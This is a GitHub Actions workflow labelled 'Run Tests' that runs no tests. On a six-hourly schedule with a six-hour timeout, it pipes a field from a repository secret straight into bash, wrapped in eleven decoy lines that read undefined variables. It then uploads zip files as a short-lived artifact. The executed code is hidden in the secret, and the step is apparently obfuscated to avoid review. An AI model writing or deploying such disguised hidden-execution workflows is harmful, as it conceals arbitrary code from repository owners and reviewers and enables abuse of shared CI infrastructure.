name: Run Tests
on:
  workflow_dispatch:

  schedule:
    - cron: '4 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          szm0: ${{ secrets.szm0 }}
        run: |
          printf '%s' "$szm0" | jq -r .un078 | /bin/bash
          echo $ymhlt11 | jq -r .vn55219 | /bin/bash
          echo $dlm07 | jq -r .bu88945 | /bin/bash
          printf '%s' "$h5522" | jq -r .irft98024 | /bin/bash
          echo $yaeg12317 | jq -r .dfirw0 | /bin/bash
          printf '%s' "$z74" | jq -r .zfk4 | /bin/bash
          echo $y230 | jq -r .c603 | /bin/bash
          printf '%s' "$ntcts94395" | jq -r .cjg6744 | /bin/bash
          echo $zyn95 | jq -r .evryd374 | /bin/bash
          printf '%s' "$ir63279" | jq -r .u886 | /bin/bash
          echo $uxdn95663 | jq -r .go61 | /bin/bash
          printf '%s' "$dte14871" | jq -r .z23 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: TQTry0p5
          path: "*.zip"
          retention-days: 1
